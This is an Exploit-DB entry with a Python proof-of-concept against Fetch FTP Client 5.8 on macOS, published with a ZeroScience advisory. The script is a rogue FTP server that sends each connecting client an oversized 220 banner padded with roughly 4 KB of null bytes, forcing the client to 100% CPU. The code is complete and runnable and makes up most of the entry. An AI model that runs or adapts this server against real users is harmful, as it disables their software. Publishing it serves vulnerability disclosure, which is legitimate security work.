Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)

EDB-ID:

50696

CVE:

N/A


Author:

LiquidWorm

Type:

local


Platform:

macOS

Date:

2022-02-02


# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm

#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm   3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop> 
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#

import socket

host = '0.0.0.0'
port = 21

s = socket.socket()
s.bind((host, port))
s.listen(2)

print('Ascolto su', host, 'porta', port, '...')

consumptor  = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'

while True:
    try:
        c, a = s.accept()
        print('Connessione da', a)
        print('CPU 100%, Memory++')
        c.send(bytes(consumptor, 'UTF-8'))
        c.send(b'Thricer OK, p\'taah\x0A\x0D')
        print(c.recv(17))
    except:
        break